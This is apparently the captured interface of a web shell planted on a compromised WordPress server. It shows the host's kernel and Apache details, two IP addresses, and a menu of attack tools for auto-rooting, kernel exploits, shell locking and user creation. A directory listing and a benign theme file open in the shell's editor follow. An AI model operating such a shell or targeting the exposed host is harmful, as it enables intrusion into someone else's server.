Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
pr /
wp-content /
themes /
Extra /
includes /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
admin
[ DIR ]
drwxr-xr-x
builder
[ DIR ]
drwxr-xr-x
ext
[ DIR ]
drwxr-xr-x
functions
[ DIR ]
drwxr-xr-x
module-customizer
[ DIR ]
drwxr-xr-x
activation.php
947
B
-rwxr-xr-x
block-editor-integration.php
2.79
KB
-rwxr-xr-x
builder-integrations.php
41.78
KB
-rwxr-xr-x
choices.php
5.12
KB
-rwxr-xr-x
core.php
56.92
KB
-rwxr-xr-x
customizer.php
125.09
KB
-rwxr-xr-x
dynamic-assets.php
1.26
KB
-rwxr-xr-x
et-social-followers.php
23.03
KB
-rwxr-xr-x
et-social-share.php
3.67
KB
-rwxr-xr-x
installation.php
248
B
-rwxr-xr-x
layouts.php
11.51
KB
-rwxr-xr-x
modules-defaults.php
13.27
KB
-rwxr-xr-x
modules.php
107.89
KB
-rwxr-xr-x
navigation.php
408
B
-rwxr-xr-x
plugins-eventon-support.php
794
B
-rwxr-xr-x
plugins-lifterlms-support.php
590
B
-rwxr-xr-x
plugins-seo-support.php
5.72
KB
-rwxr-xr-x
plugins-woocommerce-support.php
13.02
KB
-rwxr-xr-x
projects.php
5.69
KB
-rwxr-xr-x
ratings.php
5.62
KB
-rwxr-xr-x
sanitization.php
6.27
KB
-rwxr-xr-x
template-tags.php
53.39
KB
-rwxr-xr-x
theme-builder.php
2.41
KB
-rwxr-xr-x
widgets.php
51.67
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : theme-builder.php
<?php // Prevent file from being loaded directly if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } /** * Output the opening page container div. * * @since ?? * * @return void */ function et_extra_filter_theme_builder_template_before_page_wrappers() { get_template_part( 'theme-before-wrappers' ); } add_action( 'et_theme_builder_template_before_page_wrappers', 'et_extra_filter_theme_builder_template_before_page_wrappers' ); /** * Output the header if necessary. * * @since ?? * * @param integer $layout_id * @param bool $layout_enabled * * @return void */ function et_extra_filter_theme_builder_template_before_header( $layout_id, $layout_enabled ) { if ( 0 === $layout_id && $layout_enabled ) { get_template_part( 'theme-header' ); } } add_action( 'et_theme_builder_template_before_header', 'et_extra_filter_theme_builder_template_before_header', 10, 2 ); /** * Output the footer if necessary. * * @since ?? * * @param integer $layout_id * @param bool $layout_enabled * * @return void */ function et_extra_filter_theme_builder_template_after_footer( $layout_id, $layout_enabled ) { if ( 0 === $layout_id && $layout_enabled ) { get_template_part( 'theme-footer' ); } } add_action( 'et_theme_builder_template_after_footer', 'et_extra_filter_theme_builder_template_after_footer', 10, 2 ); /** * Output the closing page container div. * * @since ?? * * @return void */ function et_extra_filter_theme_builder_template_after_page_wrappers() { get_template_part( 'theme-after-wrappers' ); } add_action( 'et_theme_builder_template_after_page_wrappers', 'et_extra_filter_theme_builder_template_after_page_wrappers' ); /** * Disable TB hooks in order to be compatible with LearnDash's Focus mode. * * @since ?? */ function et_extra_action_theme_builder_compatibility_learndash_focus_mode() { remove_action( 'et_theme_builder_template_before_page_wrappers', 'et_extra_filter_theme_builder_template_before_page_wrappers' ); remove_action( 'et_theme_builder_template_before_header', 'et_extra_filter_theme_builder_template_before_header' ); remove_action( 'et_theme_builder_template_after_footer', 'et_extra_filter_theme_builder_template_after_footer' ); remove_action( 'et_theme_builder_template_after_page_wrappers', 'et_extra_filter_theme_builder_template_after_page_wrappers' ); } add_action( 'et_theme_builder_compatibility_learndash_focus_mode', 'et_extra_action_theme_builder_compatibility_learndash_focus_mode' );
Close